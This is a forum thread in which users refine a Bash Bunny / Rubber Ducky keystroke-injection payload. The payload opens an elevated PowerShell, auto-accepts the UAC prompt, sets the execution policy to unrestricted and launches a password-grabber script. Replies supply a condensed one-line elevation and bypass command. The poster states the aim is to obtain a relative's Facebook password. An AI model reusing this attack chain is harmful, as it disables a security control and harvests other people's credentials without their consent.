Jump to content

Powershell ExecutionPolicy bypass


Trhd.life

Recommended Posts

hello, this is my first submitted payload and was wondering if i can have any help maturing this script, if there was any way to polish up this script.

the point of the script is to open an admin power shell and then unrestrict the execution policy.

it came about do to the password grabber not giving be the results i needed.

 

I start off with a ducky script to set the execution policy then go on to basically loads the password grabber ps1

 

Any way to make this script better

 

Ducky Script

Quote

DELAY 3000
GUI d
DELAY 700
GUI r
DELAY 700
STRING PowerShell
DELAY 700
ENTER
DELAY 700
STRING Start-Process powershell -verb runAs
DELAY 700
ENTER
DELAY 700
ALT y
DELAY 700
STRING Set-ExecutionPolicy UnRestricted
DELAY 700
ENTER
STRING exit
DELAY 500
ENTER
DELAY 500
STRING exit
ENTER

Payload

Quote

LED SETUP
ATTACKMODE HID STORAGE


# Check for switch position to make it easier for us.
GET SWITCH_POSITION

LED ATTACK

if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ];
then
        QUACK ${SWITCH_POSITION}/ducky_script.txt
        LED FINISH
sleep 5
        LED ATTACK
RUN WIN "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
# Wait until passwords are grabbed.
sleep 10
        LED FINISH
else
    LED FAIL
    echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
        exit 1
fi

 

Link to comment
Share on other sites

Hmm, when you use the -C or the -E parameter (those are short for command and encodedcommand) it is a bypass as long as any additions are sucked in as a string to be invoked.  But, since you want a disabler you can combine the powershell part into one run command.

 

GUI r
DELAY 700
STRING "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'\""
DELAY 700
ENTER
DELAY 2000
ALT y

Of course even with the policy restricted you will see the powershell command will run the C argument, in both instances when it is called.

Link to comment
Share on other sites

Update:

My original script doers execute the payload but does not save anything in the loot file.

I have tried the suggested edit in powershell (not being executed by bash bunny) with the fallowing resaults

Quote

PS C:\Users\PC> "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'""
At line:1 char:18
+ "powershell -C \"start-process powershell -verb runas -argumentlist ' ...
+                  ~~~~~~~~~~~~~
Unexpected token 'start-process' in expression or statement.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken

also to be clear this task is to recover my mother-in-law FB password to set up her new phone

does not have to be covert i am simply using this opertunity to learn more about powershell

Link to comment
Share on other sites

That is because those \" are escaping the double quotes on the bash bunny so if you are doing it without the Bunny then it will look like this in the run command prompt.

powershell -C "start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'"

If you do it from the Bunny it will look like my previous post.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...